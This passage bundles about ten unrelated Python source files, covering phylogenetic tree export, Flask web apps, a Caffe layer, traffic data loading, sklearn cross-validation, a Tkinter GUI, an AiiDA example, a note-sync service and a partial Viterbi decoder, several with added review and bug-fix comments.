sys.path.insert(0, 'scripts')
sys.path.insert(0, os.path.join("tools", "families"))
import fam
import experiments as exp
def get_tree(ale_file):
    """Return the first line of *ale_file* containing a newick tree.

    A tree line is detected by the presence of ';' (the newick statement
    terminator). Returns None when no such line exists.
    """
    # BUG FIX: use a context manager so the file handle is closed
    # deterministically instead of leaking until garbage collection
    with open(ale_file) as reader:
        for line in reader:
            if ";" in line:
                return line
    return None
def export_ale_trees(input_trees_dir, datadir):
    """Extract the newick tree from every .ale file in *input_trees_dir*
    and write it to the family's gene-tree path under *datadir*.

    Prints a warning for families whose .ale file holds no tree, and an
    error for families whose output file cannot be written.
    """
    for f in os.listdir(input_trees_dir):
        # recover the family name from the ale file name
        family = f.replace("fix_", "").replace("_c60_lg_combined.ale", "")
        family = family + "_bmge30_renamed"
        output_tree = fam.build_gene_tree_path(datadir, "c60", family, "ale")
        ale_file = os.path.join(input_trees_dir, f)
        tree_string = get_tree(ale_file)
        # BUG FIX: the original warned when a tree WAS found and then tried
        # to write None for the missing ones; warn and skip instead
        if not tree_string:
            print("No tree for " + family)
            continue
        try:
            with open(output_tree, "w") as writer:
                writer.write(tree_string)
        except OSError:
            print("Error with family " + family)
if __name__ == "__main__":
    # exactly two positional arguments are required
    if len(sys.argv) != 3:
        print("syntax: input_trees_dir datadir")
        exit(1)
    export_ale_trees(sys.argv[1], sys.argv[2])
|
import json
from datetime import datetime, timezone
import requests
from bson import ObjectId
from flask import render_template, flash, redirect, url_for, request, Response
from flask_login import current_user, login_user, logout_user, login_required
from werkzeug.urls import url_parse
from app import app
from app.forms import LoginForm, RegistrationForm, NewProjectForm, NewTestForm
from app.models import User, Test, Project, ProjectRoles
@app.route('/')
@app.route('/index', methods=['GET', 'POST'])
@login_required
def index():
    """Home page: list all projects and handle new-project creation."""
    projects = Project.objects().all()
    form = NewProjectForm()
    if request.method == 'POST' and form.validate_on_submit():
        new_project = Project(
            name=form.name.data,
            influx_addr=form.influx_addr.data,
            influx_port=form.influx_port.data,
            influx_db=form.influx_db.data,
        )
        # the creating user becomes the project's first admin
        new_project.users = ProjectRoles(admins=[current_user.get_id()])
        new_project.save()
        flash('Congratulations, you created new project!')
    return render_template('index.html', title='Home', projects=projects, form=form)
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Sign-up page; sends already-authenticated users straight home."""
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    form = RegistrationForm()
    # guard clause: render the form unless a valid submission arrived
    if not form.validate_on_submit():
        return render_template('register.html', title='Sign In', form=form)
    new_user = User(name=form.username.data, email=form.email.data)
    new_user.set_password(form.password.data)
    new_user.save()
    flash('Congratulations, you are now a registered user!')
    return redirect(url_for('login'))
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Log a user in, honouring a safe ?next= redirect target."""
    if current_user.is_authenticated:
        return redirect(url_for('index'))
    form = LoginForm(request.form)
    if request.method == 'POST':
        if form.validate_on_submit():
            # BUG FIX: first_or_404() made the `user is None` branch dead
            # code (a 404 was raised instead); use first() so an unknown
            # user is redirected to registration as intended
            user = User.objects(name=form.username.data).first()
            if user is None:
                return redirect(url_for('register'))
            if not user.check_password(form.password.data):
                flash('Invalid username or password')
                return redirect(url_for('login'))
            login_user(user, remember=form.remember_me.data)
            # BUG FIX: next_page was computed then discarded (`pass`);
            # follow it when present, but only for relative targets to
            # avoid open redirects
            next_page = request.args.get('next')
            if not next_page or url_parse(next_page).netloc != '':
                next_page = url_for('index')
            return redirect(next_page)
    return render_template('login.html', title='Login In', form=form)
@app.route('/logout', methods=['GET'])
@login_required
def logout():
    """End the current session and return to the login page."""
    logout_user()
    return redirect(url_for('login'))
@app.route('/user/<name>')
@login_required
def user(name):
    """Profile page for the user called *name* (404 when unknown)."""
    # local renamed so it no longer shadows the view function's name
    profile = User.objects(name=name).first_or_404()
    return render_template('user.html', user=profile)
def utc_to_local(utc_dt):
    """Interpret a naive datetime as UTC and convert it to local time."""
    aware = utc_dt.replace(tzinfo=timezone.utc)
    return aware.astimezone(tz=None)
@app.route('/project/<name>', methods=['GET', 'POST'])
@login_required
def project(name):
    """Project page: show its tests and accept a new test definition."""
    form = NewTestForm()
    project = Project.objects(name=name).first_or_404()
    tests = Test.objects(project=ObjectId(project.get_id()))
    if request.method == 'POST' and form.validate_on_submit():
        # the whole test definition arrives as one JSON document
        test_json = json.loads(form.json.data)
        test = Test(
            name=test_json["name"],
            start=test_json["start"],
            testplan=test_json["testplan"],
            end=test_json["end"],
            tz=test_json["tz"],
            rump_up=test_json["rump_up"],
        )
        test.user_id = ObjectId(current_user.get_id())
        test.project = ObjectId(project.get_id())
        test.save()
        flash("Test \"" + test.name + "\" created!")
        # BUG FIX: url_for('project') without the required <name> value
        # raises a werkzeug BuildError; pass the current name explicitly
        return redirect(url_for('project', name=name))
    return render_template('project.html', title=project.name, project=project, tests=tests, form=form)
@app.route('/test/<hid>')
@login_required
def test(hid):
    """Render the results page for the test identified by *hid*."""
    test = Test.objects(hid=hid).first_or_404()
    # request payload for the summary service: influx connection details
    # plus the test window, with stored UTC timestamps rendered as local
    # time strings
    test_data = {
        "influx_addr": test.project.influx_addr,
        "influx_port": test.project.influx_port,
        "influx_db": test.project.influx_db,
        "testplan": test.testplan,
        "start": datetime.strftime(test.start.replace(tzinfo=timezone.utc).astimezone(tz=None), '%Y-%m-%d %H:%M:%S'),
        "end": datetime.strftime(test.end.replace(tzinfo=timezone.utc).astimezone(tz=None), '%Y-%m-%d %H:%M:%S'),
        "tz": str(test.tz),
        "rump_up": test.rump_up
    }
    # NOTE(review): the summary service address is hard-coded to this
    # host/port — confirm before deploying elsewhere
    resp = requests.request(
        method='POST',
        url='http://localhost:5000/api/1.0/getSummary',
        headers={"Content-Type": "application/json"},
        data=json.dumps(test_data)
    )
    response = Response(resp.content, resp.status_code)
    # summary = json.loads(json.loads(response.data)['summary'])
    # aggr = json.loads(json.loads(response.data)['aggregated'])
    # NOTE(review): the double json.loads implies getSummary returns a
    # JSON-encoded string that itself contains JSON — confirm against the API
    data = json.loads(json.loads(response.data))
    return render_template('test.html', title=test.name, test=test, data=data)
|
# -*- coding: utf-8 -*-
"""The app module, containing the app factory function."""
import logging
import traceback
import sentry_sdk
from animal_case import animalify
from flask import Flask, Response, jsonify, request, current_app, g
from flask_cors import CORS
from flask_security import SQLAlchemyUserDatastore
from flask_sslify import SSLify
from sentry_sdk.integrations.flask import FlaskIntegration
from sentry_sdk.integrations.logging import LoggingIntegration
from grant import (
commands,
proposal,
user,
ccr,
comment,
milestone,
admin,
email,
task,
rfp,
e2e,
home
)
from grant.extensions import bcrypt, migrate, db, ma, security, limiter
from grant.settings import SENTRY_RELEASE, ENV, E2E_TESTING, DEBUG, CORS_DOMAINS
from grant.utils.auth import AuthException, handle_auth_error, get_authed_user
from grant.utils.exceptions import ValidationException
class JSONResponse(Response):
    """Response class that auto-serializes plain containers to JSON."""

    @classmethod
    def force_type(cls, rv, environ=None):
        # bare containers become camelCased JSON bodies
        if isinstance(rv, (dict, list, tuple)):
            rv = jsonify(animalify(rv))
        elif rv is None:
            # no return value at all -> explicit 204 with a null payload
            rv = jsonify(data=None), 204
        return super(JSONResponse, cls).force_type(rv, environ)
def create_app(config_objects=["grant.settings"]):
    """Application factory for the grant Flask app.

    Wires the JSON response class, error handlers, extensions, blueprints,
    shell context, CLI commands and (outside testing) Sentry reporting.
    The mutable default is safe here: config_objects is only iterated.
    """
    from grant.patches import patch_werkzeug_set_samesite
    patch_werkzeug_set_samesite()
    app = Flask(__name__.split(".")[0])
    app.response_class = JSONResponse
    @app.after_request
    def send_emails(response):
        # flush any emails queued on the request-scoped g object
        if 'email_sender' in g:
            # starting email sender
            g.email_sender.start()
        return response
    # Return validation errors
    @app.errorhandler(ValidationException)
    def handle_validation_error(err):
        return jsonify({"message": str(err)}), 400
    @app.errorhandler(422)
    @app.errorhandler(400)
    def handle_error(err):
        # request-parsing errors carry structured details on err.data
        headers = err.data.get("headers", None)
        messages = err.data.get("messages", "Invalid request.")
        error_message = "Something was wrong with your request"
        if type(messages) == dict:
            if 'json' in messages:
                # surface the first JSON-body validation message verbatim
                error_message = messages['json'][0]
            else:
                current_app.logger.warn(
                    f"Unexpected error occurred: {messages}"
                )
        if headers:
            return jsonify({"message": error_message}), err.code, headers
        else:
            return jsonify({"message": error_message}), err.code
    @app.errorhandler(404)
    def handle_notfound_error(err):
        error_message = "Unknown route '{} {}'".format(request.method, request.path)
        return jsonify({"message": error_message}), 404
    @app.errorhandler(429)
    def handle_limit_error(err):
        app.logger.warn(f'Rate limited request to {request.method} {request.path} from ip {request.remote_addr}')
        return jsonify({"message": "You’ve done that too many times, please wait and try again later"}), 429
    @app.errorhandler(Exception)
    def handle_exception(err):
        # report to Sentry, log the traceback, hide internals from clients
        sentry_sdk.capture_exception(err)
        app.logger.debug(traceback.format_exc())
        app.logger.debug("Uncaught exception at {} {}, see above for traceback".format(request.method, request.path))
        return jsonify({"message": "Something went wrong"}), 500
    for conf in config_objects:
        app.config.from_object(conf)
    app.url_map.strict_slashes = False
    register_extensions(app)
    register_blueprints(app)
    register_shellcontext(app)
    register_commands(app)
    if not (app.config.get("TESTING") or E2E_TESTING):
        # INFO+ log records become breadcrumbs, ERROR+ become Sentry events
        sentry_logging = LoggingIntegration(
            level=logging.INFO,
            event_level=logging.ERROR
        )
        sentry_sdk.init(
            environment=ENV,
            release=SENTRY_RELEASE,
            integrations=[FlaskIntegration(), sentry_logging]
        )
    # handle all AuthExceptions thusly
    # NOTE: testing mode does not honor this handler, and instead returns the generic 500 response
    app.register_error_handler(AuthException, handle_auth_error)
    @app.after_request
    def grantio_authed(response):
        # tell the frontend whether this request carried a valid session
        response.headers["X-Grantio-Authed"] = 'yes' if get_authed_user() else 'no'
        return response
    return app
def register_extensions(app):
    """Register Flask extensions.

    Initialization order is preserved: the migrate extension requires the
    db extension to be bound first.
    """
    bcrypt.init_app(app)
    db.init_app(app)
    migrate.init_app(app, db)
    ma.init_app(app)
    limiter.init_app(app)
    datastore = SQLAlchemyUserDatastore(db, user.models.User, user.models.Role)
    security.init_app(app, datastore=datastore, register_blueprint=False)
    # supports_credentials for session cookies, on cookie domains (if set)
    CORS(
        app,
        supports_credentials=True,
        expose_headers='X-Grantio-Authed',
        origins=CORS_DOMAINS.split(','),
    )
    SSLify(app)
    return None
def register_blueprints(app):
    """Register Flask blueprints (registration order preserved)."""
    feature_modules = (
        ccr,
        comment,
        proposal,
        user,
        milestone,
        admin,
        email,
        task,
        rfp,
        home,
    )
    for module in feature_modules:
        app.register_blueprint(module.views.blueprint)
    if E2E_TESTING and DEBUG:
        # e2e routes are only mounted for dev/test builds
        print('Warning: e2e end-points are open, this should only be the case for development or testing')
        app.register_blueprint(e2e.views.blueprint)
def register_shellcontext(app):
    """Register shell context objects (exposes the db handle)."""
    def shell_context():
        """Shell context objects."""
        return {"db": db}

    app.shell_context_processor(shell_context)
def register_commands(app):
    """Register Click commands (registration order preserved)."""
    cli_commands = (
        commands.test,
        commands.lint,
        commands.clean,
        commands.urls,
        commands.reset_db_chain_data,
        proposal.commands.create_proposal,
        proposal.commands.create_proposals,
        proposal.commands.retire_v1_proposals,
        user.commands.set_admin,
        user.commands.mangle_users,
        task.commands.create_task,
    )
    for command in cli_commands:
        app.cli.add_command(command)
|
import caffe
import numpy as np
import argparse, pprint
class TryLayer(caffe.Layer):
    """Toy caffe Python layer: fixed 2x2 output incremented by --aa."""
    @classmethod
    def parse_args(cls, argsStr):
        """Parse the layer's param_str into an argparse Namespace."""
        parser = argparse.ArgumentParser(description='Try Layer')
        parser.add_argument('--num_classes', default=20, type=int)
        parser.add_argument('--aa', default=5, type=int)
        args = parser.parse_args(argsStr.split())
        print('Using Config:')
        pprint.pprint(args)
        return args
    def setup(self, bottom, top):
        # parse layer parameters once and fix the output shape to 2x2
        self.params_ = TryLayer.parse_args(self.param_str)
        top[0].reshape(2,2)
    def forward(self, bottom, top):
        # NOTE(review): bottom is unused and the layer adds aa onto top's
        # EXISTING data (accumulates across calls) — confirm this is the
        # intended behavior for this experiment layer
        top[0].data[...] = top[0].data + self.params_.aa * np.ones(top[0].shape)
    def backward(self, top, propagate_down, bottom):
        """ This layer has no backward """
        pass
    def reshape(self, bottom, top):
        """ This layer has no reshape """
        pass
|
import numpy as np
import pandas as pd
from tensorflow import keras
import csv
from tensorflow.keras import layers
from matplotlib import pyplot as plt
import os
from datetime import datetime
# Expected ProcData column layout (for reference):
# timestamp,Ttl Volume,Avg Volume,Ttl Through,Ttl Left Turn,Ttl Right Turn,Ttl Wrong Way,Overall Avg Speed, Zone 2, Zone 3, Zone 4, Zone 5, Zone 2.1, Zone 3.1, Zone 4.1, Zone 5.1,Class 1: 0-22ft,Class 2: 22-36ft,Class 3: 36-Up, , .1, 04 Eb Through #1, 04 Eb Through #3, 07 Eb Left Turn #1, 07 Eb Left Turn #2, 04 Eb Through #1.1, 04 Eb Through #3.1, 07 Eb Left Turn #1.1, 07 Eb Left Turn #2.1
# NOTE(review): machine-specific absolute path — parameterize before reuse
root_dir = "C:\\Users\\Mark Fuller\\Desktop\\Senior\\DM\\traffic\\resources\\RawData\\"
print("Loading Data")
# keep only entries under the raw-data root whose name mentions "csv"
root_dirs = os.listdir(root_dir)
root_dirs = list(filter(lambda x: ("csv" in x), root_dirs))
print(str(root_dirs))
files = []
# collect every file path inside each matching directory
for year_dir in root_dirs:
    full_path = root_dir + year_dir
    print("Full_path: ", str(full_path))
    csvs = os.listdir(full_path)
    full_file_paths = list(map(lambda c: (os.path.join(full_path, c)), csvs))
    files = files + full_file_paths
# only the processed-data exports are of interest
files = list(filter(lambda f: (".ProcData.csv" in f), files))
print("source files: ", str(files))
# combine all files in the list
combined_csv = pd.concat([pd.read_csv(f) for f in files])
# drop the first row, then sort all rows chronologically by timestamp.
# NOTE(review): pd.read_csv already consumed each file's header — confirm
# the first remaining row really is an extra header before dropping it
removed_headers = combined_csv.values.tolist()[1:]
removed_headers_sorted = sorted(removed_headers, key=lambda row: datetime.strptime(row[0], "%m/%d/%Y %H:%M"))
# #sort 07/27/2020 20:00
# combined_csv = combined_csv
# combined_csv = sorted(combined_csv, key = lambda row: datetime.strptime(row[0], "%m/%d/%Y %H:%M"))
# export to csv
combined_csv = pd.DataFrame(removed_headers_sorted, index=None, columns=combined_csv.columns)
combined_csv.to_csv("combined_csv.csv", index=False)
data = []
#
# for file in files:
#     with open(file) as f:
#         reader = csv.reader(f)
#
#         #Skip the header of the csv
#         next(reader)
#         print(file)
#         print(list(reader)[:5])
#         data = data + list(reader)
#         #print(file + " \t" + str(reader.line_num))
print(len(data), " lines total")
print("Data Loaded")
print("Data restructuring")
print("Data restructured")
#
#
#
# fig, ax = plt.subplots()
# df_small_noise.plot(legend=False, ax=ax)
# plt.show()
|
import numpy as np
from sklearn import cross_validation
from sklearn import datasets
from sklearn import metrics  # BUG FIX: metrics was used below but never imported
from sklearn import svm

# load test data (the iris demo dataset)
iris = datasets.load_iris()
# split data in train set and test set
X_train, X_test, y_train, y_test = cross_validation.train_test_split(
    iris.data, iris.target, test_size=0.4, random_state=0
)
# fit a linear SVM and score it on the held-out test set
clf = svm.SVC(kernel='linear', C=1).fit(X_train, y_train)
clf.score(X_test, y_test)
# cross validation
clf = svm.SVC(kernel='linear', C=1)
# cv: number of folds the dataset is split into
scores = cross_validation.cross_val_score(clf, iris.data, iris.target, cv=5)
# report the classifier's mean accuracy +/- two standard deviations,
# which also allows comparing classifiers against each other
print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
# scoring: name (string) of the metric used to score each fold
scores = cross_validation.cross_val_score(clf, iris.data, iris.target, cv=5, scoring='f1_weighted')
# cross-validation can also produce a prediction for every sample
predicted = cross_validation.cross_val_predict(clf, iris.data, iris.target, cv=10)
metrics.accuracy_score(iris.target, predicted)
# cross-validation iterators
# KFold:
#   n       : total number of elements
#   n_folds : number of folds (n_folds == n gives Leave-One-Out)
#   shuffle : whether to randomize before splitting
kf = cross_validation.KFold(4, n_folds=4)
for train, test in kf:
    print("%s %s" % (train, test))
# Leave-One-Out iterator (LeaveOneOut class)
loo = cross_validation.LeaveOneOut(4)
for train, test in loo:
    print("%s %s" % (train, test))
|
#!/usr/bin/env python
# coding: utf-8
import sys
import tkinter as tk
from tkinter.filedialog import askopenfilename
sys.path.append(".")
import spam
def handl_quit():
    """Shut down the spam backend, then destroy the main window."""
    spam.quit()
    fenetre.destroy()
def handl_run():
    """Ask the user for a file, then pass it to the spam backend to run."""
    filename = askopenfilename()
    spam.run(filename)
# build the main window ("fenetre" is French for "window")
fenetre = tk.Tk()
greeting = tk.Label(text="Hello, Tkinter")
greeting.pack()
# playback control buttons, laid out left to right; each delegates to the
# spam backend module
run_button = tk.Button(text="run", fg="black",command=handl_run)
run_button.pack( side = tk.LEFT)
replay_button = tk.Button(text="replay", fg="black",command=spam.replay)
replay_button.pack( side = tk.LEFT)
play_button = tk.Button(text="play", fg="black",command=spam.play)
play_button.pack( side = tk.LEFT)
pause_button = tk.Button(text="pause", fg="black",command=spam.pause)
pause_button.pack( side = tk.LEFT)
# playback speed selectors (1x / 2x)
accelerate1x_button = tk.Button(text="1x", fg="black",command=spam.accelerate1x)
accelerate1x_button.pack( side = tk.LEFT)
accelerate2x_button = tk.Button(text="2x", fg="black",command=spam.accelerate2x)
accelerate2x_button.pack( side = tk.LEFT)
# route the window-close button through the quit handler so the backend
# is stopped before the window is destroyed
fenetre.protocol("WM_DELETE_WINDOW", handl_quit)
fenetre.mainloop()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Run a test calculation on localhost.
Usage: ./example_01.py
"""
from os import path
import click
from aiida import cmdline, engine
from aiida.plugins import CalculationFactory
from aiida_spirit import helpers
from aiida_spirit.helpers import prepare_test_inputs
INPUT_DIR = path.join(path.dirname(path.realpath(__file__)), 'input_files')
def test_run(spirit_code):
    """Run a calculation on the localhost computer.

    Uses test helpers to create AiiDA Code on the fly.
    """
    if not spirit_code:
        # no code supplied: build one on the localhost test computer
        computer = helpers.get_computer()
        spirit_code = helpers.get_code(entry_point='spirit', computer=computer)
    # assemble the test inputs and attach the code to run with
    inputs = prepare_test_inputs(INPUT_DIR)
    inputs['code'] = spirit_code
    # Note: in order to submit your calculation to the aiida daemon, do:
    #   from aiida.engine import submit
    #   future = submit(CalculationFactory('spirit'), **inputs)
    spirit_calc = CalculationFactory('spirit')
    result = engine.run(spirit_calc, **inputs)
    print(f'Computed result: {result}')
@click.command()
@cmdline.utils.decorators.with_dbenv()
@cmdline.params.options.CODE()
def cli(code):
    """Run example.

    Example usage: $ ./example_01.py --code diff@localhost

    Alternative (creates diff@localhost-test code): $ ./example_01.py

    Help: $ ./example_01.py --help
    """
    test_run(code)
if __name__ == '__main__':
    cli()  # pylint: disable=no-value-for-parameter
|
'''
Created on Sep 10, 2010
@author: xnaud
'''
import threading
import logging
from model import modelDAO
from model.model import Note, Notebook, Tag
from service import apiService
from config import config
# number of items fetched per sync chunk from the server
_BATCH_SIZE_=10
_logger=logging.getLogger(__name__)
# Thread status
STATUS_RUNNING=1
STATUS_IDLE=0
# Request Type (values stored in SyncThread._sync_request)
SYNCHRONIZE=1
TERMINATE=2
#class SyncEvent(threading.Event):
#    _type=None
#
#    def __init__(self, type=SYNCHRONIZE, *args, **kwargs):
#        super(SyncRequestEvent, self).__init__(*args, **kwargs)
#        self._type=type
class SyncThread(threading.Thread):
    """Background worker that performs synchronization on request.

    Other threads call request_sync()/request_quit(); a threading.Event
    wakes this thread, which dispatches on the requested action type.
    """
    _sync_service=None
    _sync_request=None            # pending request type: SYNCHRONIZE or TERMINATE
    _sync_complete_callback=None  # invoked after a sync finishes
    _sync_progress_callback=None  # TODO: currently unused
    _quit=False                   # set by _perform_quit to end run()
    status = STATUS_IDLE
    def __init__(self, session_cls, user, password, sync_complete_callback=None, sync_progress_callback=None ):
        """Build the DAO/API stack bound to this thread's own session."""
        super(SyncThread, self).__init__()
        self._logger = logging.getLogger(__name__)
        # wire the entire set of objects with sqlite object bound to this thread. Silly!!
        self._session = session_cls()
        dao = modelDAO.ModelDAO(self._session)
        api = apiService.ApiService(config.configuration, user, password)
        self._sync_service = SyncService(dao, api)
        # TODO: deal with the progress callback
        self._sync_progress_callback = sync_progress_callback
        self._sync_complete_callback = sync_complete_callback
        # event used to block till the event occurs. Avoid polling or a timer
        self._event = threading.Event()
    def run(self):
        """Event loop: wait for a request, dispatch it, clear the event."""
        actions = { SYNCHRONIZE: self._perform_sync, TERMINATE: self._perform_quit }
        while not self._quit:
            self._event.wait()
            _logger.debug('thread %s: event triggered:%s' % (self.name, self._sync_request) )
            # unknown request types are silently ignored
            action = actions.get(self._sync_request, None)
            if action:
                action()
            self._event.clear()
            #gobject.idle_add(self.update_label, counter)
#        _logger.debug('thread %s sleeping' % self.name )
#        time.sleep(10)
#        _logger.debug('thread %s waking up' % self.name)
        _logger.debug('thread %s exiting' % self.name )
    ##########################
    # perform methods are executed by the sync thread
    def _perform_sync(self):
        """Run a synchronization, then notify the completion callback."""
        # NOTE(review): the actual sync call is commented out — only the
        # callback fires at the moment
        #self._sync_service.sync()
        if self._sync_complete_callback:
            self._sync_complete_callback()
    def _perform_quit(self):
        """Flag the run() loop to exit."""
        self._quit=True
    #############################
    # request methods are executed by non sync thread to request the sync thread to perform some tasks
    def request_sync(self):
        """Ask the worker thread to run a synchronization (non-blocking)."""
        _logger.debug('Sync requested')
        self._sync_request=SYNCHRONIZE
        self._event.set()
    def request_quit(self):
        """Ask the worker thread to terminate (non-blocking)."""
        self._sync_request=TERMINATE
        self._event.set()
class SyncService(object):
    """Synchronize the local cache (via the DAO) with the remote API.

    Pulls chunks of remote changes, applies them locally, detects
    conflicts with locally-dirty objects, and (eventually) pushes local
    changes back. NOTE(review): this is Python 2 code (unicode,
    dict.iteritems) and will not run unmodified on Python 3.
    """
    # init of the logger is in the init to make sure the logger config is loaded first
    _logger=None
    _dao = None
    _api_service = None
    # mappings of local property name -> remote attribute name, consumed
    # by _convert_to_properties
    _notebook_mapping = { 'name':'name', 'updated':'serviceUpdated', 'created': 'serviceCreated', 'guid':'guid',
              # not supported yet
              # 'updateSequenceNum':None, 'published':None,
              # 'defaultNotebook':None,
              # 'publishing':None,
              }
    _note_mapping = { 'active': 'active', 'content':'content', 'created':'created', 'updated':'updated',
              'guid': 'guid', 'title':'title',
              #'deleted':None,
              #'contentHash':None, 'notebookGuid': 'notebook', 'resources': None, 'tagGuids':'tags',
              }
    _tag_mapping = { 'guid' : 'guid', 'name':'name' ,
              }
    def __init__(self, dao, api):
        """Store the local DAO and remote API service handles."""
        self._dao = dao
        self._api_service = api
    def _sync_notes(self, notes):
        """Apply remote note changes locally; return conflicting notes."""
        _logger.debug("Synching notes")
        conflict=[]
        for note in notes:
            # get the note from the local cache
            cached_note = self._dao.get_note_by_guid(note.guid)
            # is cached_note is dirty (i.e. it has been changed locally
            # then we have a conflict
            if cached_note and cached_note.is_dirty:
                _logger.warning("Note %s conflict. Manual merge required" % cached_note)
                conflict.append(cached_note)
            else:
                # the content is separate
                content = self._api_service.get_note_content(note.guid)
                cached_note = self._dao.create_update_note(cached_note, **self._convert_to_properties(self._note_mapping, note) )
                # NOTE(review): unicode() is Python 2 only
                cached_note.content = unicode(content)
                # deal with relationships to notebook and to tags
                cached_note.notebook = self._dao.get_notebook_by_guid(note.notebookGuid)
                if note.tagGuids:
                    for guid in note.tagGuids:
                        tag = self._dao.create_update_tag_by_name_or_guid(guid, guid, is_dirty=False)
                        cached_note.tags.append(tag)
                # reset the dirty flag
                cached_note.is_dirty=False
        _logger.debug("Synching notes done!")
        return conflict
    def _convert_to_properties(self, mapping, object):
        """Build local-property kwargs from a remote object via *mapping*."""
        remote_props = object.__dict__
        result = {}
        # NOTE(review): iteritems is Python 2 only
        for prop,remote_prop in mapping.iteritems():
            result[prop] = remote_props[remote_prop]
        return result
    def _sync_notebooks(self, notebooks):
        """Apply remote notebook changes locally; return conflicts."""
        _logger.debug("Synching notebooks")
        conflict=[]
        for notebook in notebooks:
            # get the notebook from the local cache
            cached_notebook = self._dao.get_notebook_by_guid(notebook.guid)
            # if cached_note is dirty (i.e. it has been changed locally
            # then we have a conflict
            if cached_notebook and cached_notebook.is_dirty:
                _logger.warning("Notebook %s conflict. Manual merge required" % cached_notebook)
                conflict.append(cached_notebook)
            else:
                cached_notebook = self._dao.create_update_notebook(cached_notebook,
                                                                   **self._convert_to_properties(self._notebook_mapping, notebook) )
                cached_notebook.is_dirty=False
        _logger.debug("Synching notebooks done!")
        return conflict
    def _sync_tags(self, tags):
        """Apply remote tag changes locally; return conflicts."""
        _logger.debug("Synching tags")
        conflict=[]
        for tag in tags:
            # get the notebook from the local cache
            cached_tag = self._dao.get_tag_by_guid(tag.guid)
            if not cached_tag:
                # try to look by name
                cached_tag = self._dao.get_tag_by_name(tag.name)
            # if cached_tag is dirty (i.e. it has been changed locally
            # then we have a conflict
            if cached_tag and cached_tag.is_dirty:
                _logger.warning("Tag %s conflict. Manual merge required" % cached_tag)
                conflict.append(cached_tag)
            else:
                cached_tag = self._dao.create_update_tag(cached_tag,
                                                         **self._convert_to_properties(self._tag_mapping, tag) )
                cached_tag.is_dirty=False
        _logger.debug("Synching tags done!")
        return conflict
    def _sync(self, count_start, sync_state):
        """Pull remote changes in chunks from *count_start* and apply them.

        Returns the server update count reached after consuming all chunks.
        """
        delete_tag=[]
        create_tag=[]
        delete_note=[]
        create_note=[]
        delete_notebook=[]
        create_notebook=[]
        delete_resource=[]
        create_resource=[]
        count=count_start
        # no changes on the server?
        if count == sync_state.updateCount:
            return count
        # build a list of changes / deletion...
        while True:
            # get the first or notext chunk
            chunk = self._api_service.get_sync_chunk(count, _BATCH_SIZE_,True)
            # store the various info of the chunk
            create_tag.extend(chunk.tags or [])
            create_notebook.extend(chunk.notebooks or [])
            create_note.extend(chunk.notes or [])
            create_resource.extend(chunk.resources or [])
            delete_tag.extend(chunk.expungedTags or [])
            delete_notebook.extend(chunk.expungedNotebooks or [])
            delete_note.extend(chunk.expungedNotes or [])
            #delete_resource.extend(chunk.expungedResources or [])
            count = chunk.updateCount
            # exit condition: are we done getting all the chunks?
            if count >= chunk.chunkHighUSN:
                break
        # start the synching; notebooks first so notes can link to them
        self._sync_notebooks(create_notebook)
        self._sync_tags(create_tag)
        self._sync_notes(create_note)
        self._dao.delete_objects(Tag, Tag.guid, delete_tag)
        self._dao.delete_objects(Notebook, Notebook.guid, delete_notebook)
        self._dao.delete_objects(Note, Note.guid, delete_note)
        # TODO send the changes
        return count
    '''
    _send_changes
    send all local changes to the remote server
    '''
    def _send_changes(self):
        """Collect locally-dirty objects for upload.

        NOTE(review): gathers dirty objects but does not yet push them to
        the server — the upload is still a TODO.
        """
        notebooks = self._dao.get_dirty_objects(Notebook)
        tags = self._dao.get_dirty_objects(Tag)
        notes = self._dao.get_dirty_objects(Note)
    def sync(self, full=False):
        """Top-level entry: run an incremental (or forced full) sync."""
        sync_state = self._api_service.get_sync_state()
        last_sync = self._dao.get_or_create_last_sync()
        # check if full sync required
        if full or sync_state.fullSyncBefore > last_sync.last_sync_time:
            #full sync, start from state 0
            count_start=0
            full=True
        else:
            count_start = last_sync.last_update_count
        count = self._sync(count_start, sync_state)
        # same count, no change on server side
        #if last_sync.last_update_count==sync_state.updateCount:
        self._send_changes()
        # update the last count
        self._dao.update_last_sync(count)
|
import torch
import math
from typing import List, Tuple, Dict
def logsumexp(tensor: torch.Tensor, dim: int = -1, keepdim: bool = False) -> torch.Tensor:
    """
    A numerically stable computation of logsumexp. This is mathematically equivalent to
    `tensor.exp().sum(dim, keep=keepdim).log()`. This function is typically used for summing log
    probabilities.
    Parameters
    ----------
    tensor : torch.FloatTensor, required.
        A tensor of arbitrary size.
    dim : int, optional (default = -1)
        The dimension of the tensor to apply the logsumexp to.
    keepdim: bool, optional (default = False)
        Whether to retain a dimension of size one at the dimension we reduce over.
    """
    # subtract the per-dim maximum before exponentiating so exp() cannot
    # overflow, then add it back after the log
    max_score, _ = tensor.max(dim, keepdim=keepdim)
    offset = max_score if keepdim else max_score.unsqueeze(dim)
    stable = (tensor - offset).exp().sum(dim, keepdim=keepdim).log()
    return max_score + stable
def viterbi_decode(
    tag_sequence: torch.Tensor,
    transition_matrix: torch.Tensor,
    tag_observations = None,
    allowed_start_transitions: torch.Tensor = None,
    allowed_end_transitions: torch.Tensor = None,
    top_k: int = None,
):
    """
    Perform Viterbi decoding in log space over a sequence given a transition matrix
    specifying pairwise (transition) potentials between tags and a matrix of shape
    (sequence_length, num_tags) specifying unary potentials for possible tags per
    timestep.

    Parameters
    ----------
    tag_sequence : torch.Tensor, required.
        A tensor of shape (sequence_length, num_tags) representing scores for
        a set of tags over a given sequence.
    transition_matrix : torch.Tensor, required.
        A tensor of shape (num_tags, num_tags) representing the binary potentials
        for transitioning between a given pair of tags.
    tag_observations : Optional[List[int]], optional, (default = None)
        A list of length ``sequence_length`` containing the class ids of observed
        elements in the sequence, with unobserved elements being set to -1. Note that
        it is possible to provide evidence which results in degenerate labelings if
        the sequences of tags you provide as evidence cannot transition between each
        other, or those transitions are extremely unlikely. In this situation we log a
        warning, but the responsibility for providing self-consistent evidence ultimately
        lies with the user.
    allowed_start_transitions : torch.Tensor, optional, (default = None)
        An optional tensor of shape (num_tags,) describing which tags the START token
        may transition *to*. If provided, additional transition constraints will be used for
        determining the start element of the sequence.
    allowed_end_transitions : torch.Tensor, optional, (default = None)
        An optional tensor of shape (num_tags,) describing which tags may transition *to* the
        end tag. If provided, additional transition constraints will be used for determining
        the end element of the sequence.
    top_k : int, optional, (default = None)
